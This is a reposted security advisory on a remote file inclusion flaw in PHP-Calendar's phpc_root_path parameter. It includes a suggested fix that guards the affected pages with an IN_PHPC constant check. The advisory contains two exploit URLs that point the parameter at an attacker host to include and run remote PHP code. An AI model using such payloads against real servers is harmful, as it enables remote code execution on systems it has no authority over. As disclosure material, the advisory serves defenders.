[转载]PHP-Calendar File Inclusion Vulnerability (phpc_root_path)
信息来源:安全小组([url]www.securiteam.com[/url])Summary
PHP-Calendar is "a PHP based calendaring program". Due to insufficient filtering of user provided data by PHP-Calendar, a remote attacker can cause the program to include arbitrary PHP files (external to the web site) and execute the code found in them.
Credit:
The information has been provided by GulfTech Security.
The original article can be found at: [url]http://www.gulftech.org/?node=research&article_id=00060-12292004[/url]
Details
Exploit:
[url]http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/html.php[/url]
[url]http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.php[/url]
If PHP globals are set to on then it is highly probable that an attacker will be able to include arbitrary php files and thus execute system commands with the rights of the web server.
Solution:
PHP-Calendar has a defined constant to help prevent against stuff like this. It can be seen in other php-calendar files such as db.php
if ( !defined('IN_PHPC') ) {
die("Hacking attempt");
}
Adding the following to the top of the affected pages should suffice in preventing the kinds of attacks previously mentioned in this advisory.
页:
[1]